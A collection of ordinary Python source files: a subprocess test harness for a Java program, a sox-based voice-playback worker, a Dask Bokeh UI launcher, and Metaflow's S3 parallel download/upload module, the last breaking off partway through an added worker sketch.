def __init__(self):
commandLine = ["java",
"-cp",
"D:\\Drive\\2.Letnik\\4.semester\\Testiranje_in_kakovost\\Izzivi\\Izziv8\\Osnova10\\build\\classes",
"PodatkovnaBaza"]
self.process = subprocess.Popen(commandLine,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
self.queue = Queue.Queue()
self.thread = threading.Thread(target=enqueue_output, args=(self.process.stdout, self.queue))
self.thread.start()
self.killable = True
def __del__(self):
self.kill()
def kill(self):
if self.killable:
if self.process.poll() is None:
self.process.kill()
self.thread.join()
self.killable = False
def expect(self, expectedString):
actualString = ""
readRetries = 0
while (self.queue.empty()):
time.sleep(0.1)
readRetries += 1
if (readRetries > 100):
self.kill()
assert False
while not self.queue.empty():
actualString += self.queue.get_nowait()
if actualString[-1] == '\n':
break
actualString = actualString.strip('\n\r')
if not actualString == expectedString:
print "\nERROR: Wrong output received:\n\tExpected: '%s'\n\tActual: '%s'\n" % (expectedString, actualString)
self.kill()
assert False
def send(self, inputString):
self.process.stdin.write(inputString + "\n")
|
_v5_proc_playvoice.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# COPYRIGHT (C) 2014-2020 Mitsuo KONDOU.
# This software is released under the MIT License.
# https://github.com/konsan1101
# Thank you for keeping the rules.
import sys
import os
import time
import datetime
import codecs
import glob
import queue
import threading
import subprocess
# Interface
qCtrl_control_speech = 'temp/control_speech.txt'
# Common routines
import _v5__qRiKi
qRiKi = _v5__qRiKi.qRiKi_class()
import _v5__qFunc
qFunc = _v5__qFunc.qFunc_class()
import _v5__qLog
qLog = _v5__qLog.qLog_class()
qPLATFORM = qRiKi.getValue('qPLATFORM' )
qRUNATTR = qRiKi.getValue('qRUNATTR' )
qHOSTNAME = qRiKi.getValue('qHOSTNAME' )
qUSERNAME = qRiKi.getValue('qUSERNAME' )
qPath_pictures = qRiKi.getValue('qPath_pictures' )
qPath_videos = qRiKi.getValue('qPath_videos' )
qPath_cache = qRiKi.getValue('qPath_cache' )
qPath_sounds = qRiKi.getValue('qPath_sounds' )
qPath_icons = qRiKi.getValue('qPath_icons' )
qPath_fonts = qRiKi.getValue('qPath_fonts' )
qPath_log = qRiKi.getValue('qPath_log' )
qPath_work = qRiKi.getValue('qPath_work' )
qPath_rec = qRiKi.getValue('qPath_rec' )
qPath_s_ctrl = qRiKi.getValue('qPath_s_ctrl' )
qPath_s_inp = qRiKi.getValue('qPath_s_inp' )
qPath_s_wav = qRiKi.getValue('qPath_s_wav' )
qPath_s_jul = qRiKi.getValue('qPath_s_jul' )
qPath_s_STT = qRiKi.getValue('qPath_s_STT' )
qPath_s_TTS = qRiKi.getValue('qPath_s_TTS' )
qPath_s_TRA = qRiKi.getValue('qPath_s_TRA' )
qPath_s_play = qRiKi.getValue('qPath_s_play' )
qPath_v_ctrl = qRiKi.getValue('qPath_v_ctrl' )
qPath_v_inp = qRiKi.getValue('qPath_v_inp' )
qPath_v_jpg = qRiKi.getValue('qPath_v_jpg' )
qPath_v_detect = qRiKi.getValue('qPath_v_detect' )
qPath_v_cv = qRiKi.getValue('qPath_v_cv' )
qPath_v_photo = qRiKi.getValue('qPath_v_photo' )
qPath_v_msg = qRiKi.getValue('qPath_v_msg' )
qPath_d_ctrl = qRiKi.getValue('qPath_d_ctrl' )
qPath_d_play = qRiKi.getValue('qPath_d_play' )
qPath_d_prtscn = qRiKi.getValue('qPath_d_prtscn' )
qPath_d_movie = qRiKi.getValue('qPath_d_movie' )
qPath_d_upload = qRiKi.getValue('qPath_d_upload' )
qBusy_dev_cpu = qRiKi.getValue('qBusy_dev_cpu' )
qBusy_dev_com = qRiKi.getValue('qBusy_dev_com' )
qBusy_dev_mic = qRiKi.getValue('qBusy_dev_mic' )
qBusy_dev_spk = qRiKi.getValue('qBusy_dev_spk' )
qBusy_dev_cam = qRiKi.getValue('qBusy_dev_cam' )
qBusy_dev_dsp = qRiKi.getValue('qBusy_dev_dsp' )
qBusy_dev_scn = qRiKi.getValue('qBusy_dev_scn' )
qBusy_s_ctrl = qRiKi.getValue('qBusy_s_ctrl' )
qBusy_s_inp = qRiKi.getValue('qBusy_s_inp' )
qBusy_s_wav = qRiKi.getValue('qBusy_s_wav' )
qBusy_s_STT = qRiKi.getValue('qBusy_s_STT' )
qBusy_s_TTS = qRiKi.getValue('qBusy_s_TTS' )
qBusy_s_TRA = qRiKi.getValue('qBusy_s_TRA' )
qBusy_s_play = qRiKi.getValue('qBusy_s_play' )
qBusy_v_ctrl = qRiKi.getValue('qBusy_v_ctrl' )
qBusy_v_inp = qRiKi.getValue('qBusy_v_inp' )
qBusy_v_QR = qRiKi.getValue('qBusy_v_QR' )
qBusy_v_jpg = qRiKi.getValue('qBusy_v_jpg' )
qBusy_v_CV = qRiKi.getValue('qBusy_v_CV' )
qBusy_d_ctrl = qRiKi.getValue('qBusy_d_ctrl' )
qBusy_d_inp = qRiKi.getValue('qBusy_d_inp' )
qBusy_d_QR = qRiKi.getValue('qBusy_d_QR' )
qBusy_d_rec = qRiKi.getValue('qBusy_d_rec' )
qBusy_d_telework = qRiKi.getValue('qBusy_d_telework' )
qBusy_d_play = qRiKi.getValue('qBusy_d_play' )
qBusy_d_browser = qRiKi.getValue('qBusy_d_browser' )
qBusy_d_upload = qRiKi.getValue('qBusy_d_upload' )
qRdy__s_force = qRiKi.getValue('qRdy__s_force' )
qRdy__s_fproc = qRiKi.getValue('qRdy__s_fproc' )
qRdy__s_sendkey = qRiKi.getValue('qRdy__s_sendkey' )
qRdy__v_mirror = qRiKi.getValue('qRdy__v_mirror' )
qRdy__v_reader = qRiKi.getValue('qRdy__v_reader' )
qRdy__v_sendkey = qRiKi.getValue('qRdy__v_sendkey' )
qRdy__d_reader = qRiKi.getValue('qRdy__d_reader' )
qRdy__d_sendkey = qRiKi.getValue('qRdy__d_sendkey' )
class proc_playvoice:
def __init__(self, name='thread', id='0', runMode='debug',
micDev='0', micType='bluetooth', micGuide='on', micLevel='777', ):
self.path = qPath_s_play
self.runMode = runMode
self.micDev = micDev
self.micType = micType
self.micGuide = micGuide
self.micLevel = micLevel
self.breakFlag = threading.Event()
self.breakFlag.clear()
self.name = name
self.id = id
self.proc_id = '{0:10s}'.format(name).replace(' ', '_')
self.proc_id = self.proc_id[:-2] + '_' + str(id)
if (runMode == 'debug'):
self.logDisp = True
else:
self.logDisp = False
qLog.log('info', self.proc_id, 'init', display=self.logDisp, )
self.proc_s = None
self.proc_r = None
self.proc_main = None
self.proc_beat = None
self.proc_last = None
self.proc_step = '0'
self.proc_seq = 0
def __del__(self, ):
qLog.log('info', self.proc_id, 'bye!', display=self.logDisp, )
def begin(self, ):
#qLog.log('info', self.proc_id, 'start')
self.fileRun = qPath_work + self.proc_id + '.run'
self.fileRdy = qPath_work + self.proc_id + '.rdy'
self.fileBsy = qPath_work + self.proc_id + '.bsy'
qFunc.statusSet(self.fileRun, False)
qFunc.statusSet(self.fileRdy, False)
qFunc.statusSet(self.fileBsy, False)
self.proc_s = queue.Queue()
self.proc_r = queue.Queue()
self.proc_main = threading.Thread(target=self.main_proc, args=(self.proc_s, self.proc_r, ))
self.proc_beat = time.time()
self.proc_last = time.time()
self.proc_step = '0'
self.proc_seq = 0
self.proc_main.setDaemon(True)
self.proc_main.start()
def abort(self, waitMax=5, ):
qLog.log('info', self.proc_id, 'stop', display=self.logDisp, )
self.breakFlag.set()
chktime = time.time()
while (not self.proc_beat is None) and ((time.time() - chktime) < waitMax):
time.sleep(0.25)
chktime = time.time()
while (os.path.exists(self.fileRun)) and ((time.time() - chktime) < waitMax):
time.sleep(0.25)
def put(self, data, ):
self.proc_s.put(data)
return True
def checkGet(self, waitMax=5, ):
chktime = time.time()
while (self.proc_r.qsize() == 0) and ((time.time() - chktime) < waitMax):
time.sleep(0.10)
data = self.get()
return data
def get(self, ):
if (self.proc_r.qsize() == 0):
return ['', '']
data = self.proc_r.get()
self.proc_r.task_done()
return data
def main_proc(self, cn_r, cn_s, ):
# Log
qLog.log('info', self.proc_id, 'start', display=self.logDisp, )
qFunc.statusSet(self.fileRun, True)
self.proc_beat = time.time()
# Initial setup
self.proc_step = '1'
# Wait loop
self.proc_step = '5'
while (self.proc_step == '5'):
self.proc_beat = time.time()
# Check for stop request
if (self.breakFlag.is_set()):
self.breakFlag.clear()
self.proc_step = '9'
break
# Get from queue
if (cn_r.qsize() > 0):
cn_r_get = cn_r.get()
inp_name = cn_r_get[0]
inp_value = cn_r_get[1]
cn_r.task_done()
else:
inp_name = ''
inp_value = ''
if (cn_r.qsize() > 1) or (cn_s.qsize() > 20):
qLog.log('warning', self.proc_id, 'queue overflow warning!, ' + str(cn_r.qsize()) + ', ' + str(cn_s.qsize()))
# Set ready flag
if (qFunc.statusCheck(self.fileRdy) == False):
qFunc.statusSet(self.fileRdy, True)
# Status response
if (inp_name.lower() == '_status_'):
out_name = inp_name
out_value = '_ready_'
cn_s.put([out_name, out_value])
# Processing
path = self.path
path_files = glob.glob(path + '*')
path_files.sort()
#if (len(path_files) > 0):
# Folder re-scan loop
while (len(path_files) > 0):
#try:
if (True):
# Voice input in progress
if (self.micType == 'bluetooth'):
if (len(glob.glob(qPath_s_inp + '*')) == 0):
qFunc.statusWait_false(qBusy_s_inp, 3)
chktime = time.time()
while (len(glob.glob(qPath_s_inp + '*')) > 0) and ((time.time() - chktime) < 3):
qLog.log('info', self.proc_id, 'voice input waiting !', display=self.logDisp,)
time.sleep(0.50)
for f in path_files:
# Check for stop request
if (self.breakFlag.is_set()):
self.breakFlag.clear()
self.proc_step = '9'
break
proc_file = f.replace('\\', '/')
if (proc_file[-4:].lower() == '.wav' and proc_file[-8:].lower() != '.wrk.wav'):
f1 = proc_file
f2 = proc_file[:-4] + '.wrk.wav'
try:
os.rename(f1, f2)
proc_file = f2
except Exception as e:
pass
if (proc_file[-4:].lower() == '.mp3' and proc_file[-8:].lower() != '.wrk.mp3'):
f1 = proc_file
f2 = proc_file[:-4] + '.wrk.mp3'
try:
os.rename(f1, f2)
proc_file = f2
except Exception as e:
pass
if (proc_file[-8:].lower() == '.wrk.wav' or proc_file[-8:].lower() == '.wrk.mp3'):
f1 = proc_file
f2 = proc_file[:-8] + proc_file[-4:]
try:
os.rename(f1, f2)
proc_file = f2
except Exception as e:
pass
# Execution counter
self.proc_last = time.time()
self.proc_seq += 1
if (self.proc_seq > 9999):
self.proc_seq = 1
seq4 = '{:04}'.format(self.proc_seq)
seq2 = '{:02}'.format(self.proc_seq)
proc_name = proc_file.replace(path, '')
proc_name = proc_name[:-4]
work_name = self.proc_id + '.' + seq2
work_file = qPath_work + work_name + '.mp3'
if (os.path.exists(work_file)):
os.remove(work_file)
sox = subprocess.Popen(['sox', '-q', proc_file, '-r', '16000', '-b', '16', '-c', '1', work_file, ], \
stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
sox.wait()
sox.terminate()
sox = None
if (os.path.exists(work_file)):
if (self.micDev.isdigit()):
os.remove(proc_file)
# Log
if (self.runMode == 'debug') or (not self.micDev.isdigit()):
qLog.log('info', self.proc_id, '' + proc_name + u' → ' + work_name, display=self.logDisp,)
# Output result
if (cn_s.qsize() < 99):
out_name = 'filename'
out_value = work_file
cn_s.put([out_name, out_value])
# Set busy flag
if (qFunc.statusCheck(self.fileBsy) == False):
qFunc.statusSet(self.fileBsy, True)
if (str(self.id) == '0'):
qFunc.statusSet(qBusy_s_play, True)
if (self.micType == 'bluetooth') \
or (self.micGuide == 'on' or self.micGuide == 'sound'):
qFunc.statusWait_false(qBusy_s_inp, 3)
# Play audio
if (qFunc.statusCheck(qBusy_dev_spk) == True):
qLog.log('info', 'spk_busy!_:' + work_name, )
else:
sox=subprocess.Popen(['sox', '-q', work_file, '-d', '--norm', ], \
stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
#if (self.runMode == 'debug') \
#or (self.runMode == 'hud') \
#or (self.runMode == 'live') \
#or (self.runMode == 'translator'):
if (self.runMode != 'speech'):
sox.wait()
sox.terminate()
sox = None
time.sleep(0.50)
break  # re-scan the folder after playing one file
#except Exception as e:
# pass
# Re-scan the folder
path_files = glob.glob(path + '*')
path_files.sort()
# Clear busy flag
qFunc.statusSet(self.fileBsy, False)
if (str(self.id) == '0'):
qFunc.statusSet(qBusy_s_play, False)
# Exit when run as a batch job
if (not self.micDev.isdigit()):
break
# Idle wait
slow = False
if (qFunc.statusCheck(qBusy_dev_cpu) == True):
slow = True
if (qFunc.statusCheck(qBusy_dev_spk) == True):
slow = True
if (slow == True):
time.sleep(1.00)
else:
if (cn_r.qsize() == 0):
time.sleep(0.25)
else:
time.sleep(0.05)
# Shutdown processing
if (True):
# Clear ready flag
qFunc.statusSet(self.fileRdy, False)
# Clear busy flag
qFunc.statusSet(self.fileBsy, False)
if (str(self.id) == '0'):
qFunc.statusSet(qBusy_s_play, False)
# Drain the queues
while (cn_r.qsize() > 0):
cn_r_get = cn_r.get()
cn_r.task_done()
while (cn_s.qsize() > 0):
cn_s_get = cn_s.get()
cn_s.task_done()
# Log
qLog.log('info', self.proc_id, 'end', display=self.logDisp, )
qFunc.statusSet(self.fileRun, False)
self.proc_beat = None
if __name__ == '__main__':
# Common classes
qRiKi.init()
qFunc.init()
# Log
nowTime = datetime.datetime.now()
filename = qPath_log + nowTime.strftime('%Y%m%d.%H%M%S') + '.' + os.path.basename(__file__) + '.log'
qLog.init(mode='logger', filename=filename, )
# Initial setup
qFunc.remove(qCtrl_control_speech)
qRiKi.statusReset_speech(False)
# Parameters
runMode = 'debug'
if (len(sys.argv) >= 2):
runMode = str(sys.argv[1]).lower()
# Start
playvoice_thread = proc_playvoice('playvoice', '0', runMode, )
playvoice_thread.begin()
# Test run
if (len(sys.argv) < 2):
qFunc.copy('_sounds/_sound_hallo.wav', qPath_s_play + '_sound_hallo.wav')
chktime = time.time()
while ((time.time() - chktime) < 15):
res_data = playvoice_thread.get()
res_name = res_data[0]
res_value = res_data[1]
if (res_name != ''):
print(res_name, res_value, )
if (playvoice_thread.proc_s.qsize() == 0):
playvoice_thread.put(['_status_', ''])
time.sleep(0.05)
# Standalone run
if (len(sys.argv) >= 2):
# Wait loop
while (True):
# Check for termination
control = ''
txts, txt = qFunc.txtsRead(qCtrl_control_speech)
if (txts != False):
qLog.log('info', str(txt))
if (txt == '_end_'):
break
else:
qFunc.remove(qCtrl_control_speech)
control = txt
# Message
res_data = playvoice_thread.get()
res_name = res_data[0]
res_value = res_data[1]
#if (res_name != ''):
# print(res_name, res_value, )
time.sleep(0.50)
# Shutdown
playvoice_thread.abort()
del playvoice_thread
|
application.py
|
import json
import logging
import multiprocessing
import os
import socket
import sys
import bokeh
import distributed.bokeh
from ..utils import ignoring
dirname = os.path.dirname(distributed.__file__)
paths = [os.path.join(dirname, 'bokeh', name)
for name in ['status', 'tasks', 'workers']]
binname = 'bokeh.exe' if sys.platform.startswith('win') else 'bokeh'
binname = os.path.join(os.path.dirname(sys.argv[0]), binname)
logger = logging.getLogger(__file__)
dask_dir = os.path.join(os.path.expanduser('~'), '.dask')
if not os.path.exists(dask_dir):
os.mkdir(dask_dir)
class BokehWebInterface(object):
def __init__(self, host='127.0.0.1', http_port=9786, tcp_port=8786,
bokeh_port=8787, bokeh_whitelist=[], log_level='critical',
show=False, prefix=None, use_xheaders=False, quiet=True):
self.port = bokeh_port
ip = socket.gethostbyname(host)
hosts = ['localhost',
'127.0.0.1',
ip,
host]
with ignoring(Exception):
hosts.append(socket.gethostbyname(ip))
with ignoring(Exception):
hosts.append(socket.gethostbyname(socket.gethostname()))
hosts = ['%s:%d' % (h, bokeh_port) for h in hosts]
hosts.append("*")
hosts.extend(map(str, bokeh_whitelist))
args = ([binname, 'serve'] + paths +
['--log-level', 'warning',
'--check-unused-sessions=50',
'--unused-session-lifetime=1',
'--port', str(bokeh_port)] +
sum([['--host', h] for h in hosts], []))
if prefix:
args.extend(['--prefix', prefix])
if show:
args.append('--show')
if use_xheaders:
args.append('--use-xheaders')
if log_level in ('debug', 'info', 'warning', 'error', 'critical'):
args.extend(['--log-level', log_level])
bokeh_options = {'host': host,
'http-port': http_port,
'tcp-port': tcp_port,
'bokeh-port': bokeh_port}
with open(os.path.join(dask_dir, '.dask-web-ui.json'), 'w') as f:
json.dump(bokeh_options, f, indent=2)
if sys.version_info[0] >= 3:
ctx = multiprocessing.get_context('spawn')
self.process = ctx.Process(target=bokeh_main, args=(args,), daemon=True)
self.process.start()
else:
import subprocess
self.process = subprocess.Popen(args, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
if not quiet:
logger.info(" Bokeh UI at: http://%s:%d/status/"
% (ip, bokeh_port))
def close(self, join=True, timeout=None):
if sys.version_info[0] >= 3:
try:
if self.process.is_alive():
self.process.terminate()
except AssertionError:
self.process.terminate()
if join:
self.process.join(timeout=timeout)
else:
if self.process.returncode is None:
self.process.terminate()
def __del__(self):
self.close()
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def bokeh_main(args):
from bokeh.command.bootstrap import main
import logging
logging.getLogger('bokeh').setLevel(logging.CRITICAL)
main(args)
|
s3op.py
|
from __future__ import print_function
import json
import time
import math
import sys
import os
import traceback
from hashlib import sha1
from tempfile import NamedTemporaryFile
from multiprocessing import Process, Queue
from itertools import starmap, chain, islice
from boto3.s3.transfer import TransferConfig
try:
# python2
from urlparse import urlparse
from Queue import Full as QueueFull
except:
# python3
from urllib.parse import urlparse
from queue import Full as QueueFull
# s3op can be launched as a stand-alone script. We must set
# PYTHONPATH for the parent Metaflow explicitly.
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "../../")))
from metaflow._vendor import click
# we use Metaflow's parallel_imap_unordered instead of
# multiprocessing.Pool because https://bugs.python.org/issue31886
from metaflow.util import TempDir, url_quote, url_unquote
from metaflow.multicore_utils import parallel_map
from metaflow.datatools.s3util import aws_retry, read_in_chunks, get_timestamp
NUM_WORKERS_DEFAULT = 64
DOWNLOAD_FILE_THRESHOLD = 2 * TransferConfig().multipart_threshold
DOWNLOAD_MAX_CHUNK = 2 * 1024 * 1024 * 1024 - 1
class S3Url(object):
def __init__(
self,
bucket,
path,
url,
local,
prefix,
content_type=None,
metadata=None,
range=None,
):
self.bucket = bucket
self.path = path
self.url = url
self.local = local
self.prefix = prefix
self.content_type = content_type
self.metadata = metadata
self.range = range
def __str__(self):
return self.url
# We use error codes instead of Exceptions, which are trickier to
# handle reliably in a multi-process world
ERROR_INVALID_URL = 4
ERROR_NOT_FULL_PATH = 5
ERROR_URL_NOT_FOUND = 6
ERROR_URL_ACCESS_DENIED = 7
ERROR_WORKER_EXCEPTION = 8
ERROR_VERIFY_FAILED = 9
ERROR_LOCAL_FILE_NOT_FOUND = 10
def format_triplet(prefix, url="", local=""):
return u" ".join(url_quote(x).decode("utf-8") for x in (prefix, url, local))
# It is not obvious what the right way to deal
# with boto errors is. This function can be replaced
# with better error handling code.
def normalize_client_error(err):
error_code = err.response["Error"]["Code"]
try:
return int(error_code)
except ValueError:
if error_code in ("AccessDenied", "AllAccessDisabled"):
return 403
if error_code == "NoSuchKey":
return 404
return error_code
# S3 worker pool
def worker(result_file_name, queue, mode):
# Interpret mode, it can either be a single op or something like
# info_download or info_upload which implies:
# - for download: we need to return the information as well
# - for upload: we need to not overwrite the file if it exists
modes = mode.split("_")
pre_op_info = False
if len(modes) > 1:
pre_op_info = True
mode = modes[1]
else:
mode = modes[0]
def op_info(url):
try:
head = s3.head_object(Bucket=url.bucket, Key=url.path)
to_return = {
"error": None,
"size": head["ContentLength"],
"content_type": head["ContentType"],
"metadata": head["Metadata"],
"last_modified": get_timestamp(head["LastModified"]),
}
except client_error as err:
error_code = normalize_client_error(err)
if error_code == 404:
to_return = {"error": ERROR_URL_NOT_FOUND, "raise_error": err}
elif error_code == 403:
to_return = {"error": ERROR_URL_ACCESS_DENIED, "raise_error": err}
else:
to_return = {"error": error_code, "raise_error": err}
return to_return
with open(result_file_name, "w") as result_file:
try:
from metaflow.datatools.s3util import get_s3_client
s3, client_error = get_s3_client()
while True:
url, idx = queue.get()
if url is None:
break
if mode == "info":
result = op_info(url)
orig_error = result.get("raise_error", None)
if orig_error:
del result["raise_error"]
with open(url.local, "w") as f:
json.dump(result, f)
elif mode == "download":
tmp = NamedTemporaryFile(dir=".", mode="wb", delete=False)
try:
if url.range:
resp = s3.get_object(
Bucket=url.bucket, Key=url.path, Range=url.range
)
else:
resp = s3.get_object(Bucket=url.bucket, Key=url.path)
sz = resp["ContentLength"]
if not url.range and sz > DOWNLOAD_FILE_THRESHOLD:
# In this case, it is more efficient to use download_file as it
# will download multiple parts in parallel (it does it after
# multipart_threshold)
s3.download_file(url.bucket, url.path, tmp.name)
else:
read_in_chunks(tmp, resp["Body"], sz, DOWNLOAD_MAX_CHUNK)
tmp.close()
os.rename(tmp.name, url.local)
except client_error as err:
tmp.close()
os.unlink(tmp.name)
error_code = normalize_client_error(err)
if error_code == 404:
result_file.write("%d %d\n" % (idx, -ERROR_URL_NOT_FOUND))
continue
elif error_code == 403:
result_file.write(
"%d %d\n" % (idx, -ERROR_URL_ACCESS_DENIED)
)
continue
else:
raise
# TODO specific error message for out of disk space
# If we need the metadata, get it and write it out
if pre_op_info:
with open("%s_meta" % url.local, mode="w") as f:
args = {"size": resp["ContentLength"]}
if resp["ContentType"]:
args["content_type"] = resp["ContentType"]
if resp["Metadata"] is not None:
args["metadata"] = resp["Metadata"]
if resp["LastModified"]:
args["last_modified"] = get_timestamp(
resp["LastModified"]
)
json.dump(args, f)
# Finally, we push out the size to the result_pipe since
# the size is used for verification and other purposes and
# we want to avoid file operations for this simple process
result_file.write("%d %d\n" % (idx, resp["ContentLength"]))
else:
# This is upload, if we have a pre_op, it means we do not
# want to overwrite
do_upload = False
if pre_op_info:
result_info = op_info(url)
if result_info["error"] == ERROR_URL_NOT_FOUND:
# We only upload if the file is not found
do_upload = True
else:
# No pre-op so we upload
do_upload = True
if do_upload:
extra = None
if url.content_type or url.metadata:
extra = {}
if url.content_type:
extra["ContentType"] = url.content_type
if url.metadata is not None:
extra["Metadata"] = url.metadata
s3.upload_file(url.local, url.bucket, url.path, ExtraArgs=extra)
# We indicate that the file was uploaded
result_file.write("%d %d\n" % (idx, 0))
except:
traceback.print_exc()
sys.exit(ERROR_WORKER_EXCEPTION)
def start_workers(mode, urls, num_workers):
# We start the minimum of len(urls) or num_workers to avoid starting
# workers that will definitely do nothing
num_workers = min(num_workers, len(urls))
queue = Queue(len(urls) + num_workers)
procs = {}
# 1. push sources and destinations to the queue
for idx, elt in enumerate(urls):
queue.put((elt, idx))
# 2. push end-of-queue markers
for i in range(num_workers):
queue.put((None, None))
# 3. Prepare the result structure
sz_results = [None] * len(urls)
# 4. start processes
with TempDir() as output_dir:
for i in range(num_workers):
file_path = os.path.join(output_dir, str(i))
p = Process(target=worker, args=(file_path, queue, mode))
p.start()
procs[p] = file_path
# 5. wait for the processes to finish; we continuously update procs
# to remove all processes that have finished already
while procs:
new_procs = {}
for proc, out_path in procs.items():
proc.join(timeout=1)
if proc.exitcode is not None:
if proc.exitcode != 0:
msg = "Worker process failed (exit code %d)" % proc.exitcode
exit(msg, proc.exitcode)
# Read the output file if all went well
with open(out_path, "r") as out_file:
for line in out_file:
line_split = line.split(" ")
sz_results[int(line_split[0])] = int(line_split[1])
else:
# Put this process back in the processes to check
new_procs[proc] = out_path
procs = new_procs
return sz_results
def process_urls(mode, urls, verbose, num_workers):
if verbose:
print("%sing %d files.." % (mode.capitalize(), len(urls)), file=sys.stderr)
start = time.time()
sz_results = start_workers(mode, urls, num_workers)
end = time.time()
if verbose:
total_size = sum(sz for sz in sz_results if sz is not None and sz > 0)
bw = total_size / (end - start)
print(
"%sed %d files, %s in total, in %d seconds (%s/s)."
% (
mode.capitalize(),
len(urls),
with_unit(total_size),
end - start,
with_unit(bw),
),
file=sys.stderr,
)
return sz_results
# Utility functions
def with_unit(x):
if x > 1024 ** 3:
return "%.1fGB" % (x / 1024.0 ** 3)
elif x > 1024 ** 2:
return "%.1fMB" % (x / 1024.0 ** 2)
elif x > 1024:
return "%.1fKB" % (x / 1024.0)
else:
return "%d bytes" % x
# S3Ops class is just a wrapper for get_size and list_prefix
# required by @aws_retry decorator, which needs the reset_client
# method. Otherwise they would be just stand-alone functions.
class S3Ops(object):
def __init__(self):
self.s3 = None
self.client_error = None
def reset_client(self, hard_reset=False):
from metaflow.datatools.s3util import get_s3_client
if hard_reset or self.s3 is None:
self.s3, self.client_error = get_s3_client()
@aws_retry
def get_info(self, url):
self.reset_client()
try:
head = self.s3.head_object(Bucket=url.bucket, Key=url.path)
return (
True,
url,
[
(
S3Url(
bucket=url.bucket,
path=url.path,
url=url.url,
local=url.local,
prefix=url.prefix,
content_type=head["ContentType"],
metadata=head["Metadata"],
range=url.range,
),
head["ContentLength"],
)
],
)
except self.client_error as err:
error_code = normalize_client_error(err)
if error_code == 404:
return False, url, ERROR_URL_NOT_FOUND
elif error_code == 403:
return False, url, ERROR_URL_ACCESS_DENIED
else:
raise
@aws_retry
def list_prefix(self, prefix_url, delimiter=""):
self.reset_client()
url_base = "s3://%s/" % prefix_url.bucket
try:
paginator = self.s3.get_paginator("list_objects_v2")
urls = []
for page in paginator.paginate(
Bucket=prefix_url.bucket, Prefix=prefix_url.path, Delimiter=delimiter
):
# note that an url may be both a prefix and an object
# - the trailing slash is significant in S3
if "Contents" in page:
for key in page.get("Contents", []):
url = url_base + key["Key"]
urlobj = S3Url(
url=url,
bucket=prefix_url.bucket,
path=key["Key"],
local=generate_local_path(url),
prefix=prefix_url.url,
)
urls.append((urlobj, key["Size"]))
if "CommonPrefixes" in page:
# we get CommonPrefixes if Delimiter is a non-empty string
for key in page.get("CommonPrefixes", []):
url = url_base + key["Prefix"]
urlobj = S3Url(
url=url,
bucket=prefix_url.bucket,
path=key["Prefix"],
local=None,
prefix=prefix_url.url,
)
urls.append((urlobj, None))
return True, prefix_url, urls
except self.s3.exceptions.NoSuchBucket:
return False, prefix_url, ERROR_URL_NOT_FOUND
except self.client_error as err:
if err.response["Error"]["Code"] in ("AccessDenied", "AllAccessDisabled"):
return False, prefix_url, ERROR_URL_ACCESS_DENIED
else:
raise
# We want to reuse an s3 client instance over multiple operations.
# This is accomplished by op_ functions below.
def op_get_info(urls):
s3 = S3Ops()
return [s3.get_info(url) for url in urls]
def op_list_prefix(prefix_urls):
s3 = S3Ops()
return [s3.list_prefix(prefix) for prefix in prefix_urls]
def op_list_prefix_nonrecursive(prefix_urls):
s3 = S3Ops()
return [s3.list_prefix(prefix, delimiter="/") for prefix in prefix_urls]
def exit(exit_code, url):
if exit_code == ERROR_INVALID_URL:
msg = "Invalid url: %s" % url.url
elif exit_code == ERROR_NOT_FULL_PATH:
msg = "URL not a full path: %s" % url.url
elif exit_code == ERROR_URL_NOT_FOUND:
msg = "URL not found: %s" % url.url
elif exit_code == ERROR_URL_ACCESS_DENIED:
msg = "Access denied to URL: %s" % url.url
elif exit_code == ERROR_WORKER_EXCEPTION:
msg = "Download failed"
elif exit_code == ERROR_VERIFY_FAILED:
msg = "Verification failed for URL %s, local file %s" % (url.url, url.local)
elif exit_code == ERROR_LOCAL_FILE_NOT_FOUND:
msg = "Local file not found: %s" % url
else:
msg = "Unknown error"
print("s3op failed:\n%s" % msg, file=sys.stderr)
sys.exit(exit_code)
def verify_results(urls, verbose=False):
for url, expected in urls:
if verbose:
print("verifying %s, expected %s" % (url, expected), file=sys.stderr)
try:
got = os.stat(url.local).st_size
except OSError:
exit(ERROR_VERIFY_FAILED, url)
if expected != got:
exit(ERROR_VERIFY_FAILED, url)
if url.content_type or url.metadata:
# Verify that we also have a metadata file present
try:
os.stat("%s_meta" % url.local)
except OSError:
exit(ERROR_VERIFY_FAILED, url)
def generate_local_path(url, suffix=None):
# this function generates a safe local file name corresponding to
# an S3 URL. URLs may be longer than maximum file length limit on Linux,
# so we mostly hash the URL but retain the leaf part as a convenience
# feature to ease eyeballing
quoted = url_quote(url)
fname = quoted.split(b"/")[-1].replace(b".", b"_").replace(b"-", b"_")
sha = sha1(quoted).hexdigest()
if suffix:
return u"-".join((sha, fname.decode("utf-8"), suffix))
return u"-".join((sha, fname.decode("utf-8")))
def parallel_op(op, lst, num_workers):
# parallel op divides work equally amongst num_workers
# processes. This is a good strategy if the cost is
# uniform over the units of work, e.g. op_get_info, which
# is a single HEAD request to S3.
#
# This approach is less optimal with op_list_prefix where
# the cost of S3 listing per prefix can vary drastically.
# We could optimize this case by using a worker model with
# a queue, as we do for downloads; the difference here is
# that we need to return a value, which would require a
# bit more work - something to consider if this turns out
# to be a bottleneck. (A minimal sketch of that approach
# follows this function.)
if lst:
num = min(len(lst), num_workers)
batch_size = math.ceil(len(lst) / float(num))
batches = []
it = iter(lst)
while True:
batch = list(islice(it, batch_size))
if batch:
batches.append(batch)
else:
break
it = parallel_map(op, batches, max_parallel=num)
for x in chain.from_iterable(it):
yield x
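# A minimal sketch of the queue-based worker model mentioned in the comment inside
# parallel_op above. It is not used by this module and the name queued_parallel_op
# is illustrative, not part of the s3op CLI. Workers pull items from a shared task
# queue and push back (index, result) pairs, so uneven per-item costs (for example
# S3 listings of very different sizes) are balanced dynamically. It assumes a
# fork-based multiprocessing start method; under spawn the worker closure would
# have to live at module level.
def queued_parallel_op(op, lst, num_workers):
    from multiprocessing import Process, Queue as MPQueue

    n = min(num_workers, len(lst))
    if n == 0:
        return []
    tasks, results = MPQueue(), MPQueue()
    for idx, item in enumerate(lst):
        tasks.put((idx, item))
    for _ in range(n):
        tasks.put(None)  # one end-of-queue marker per worker

    def _worker(task_q, result_q):
        while True:
            task = task_q.get()
            if task is None:
                break
            idx, item = task
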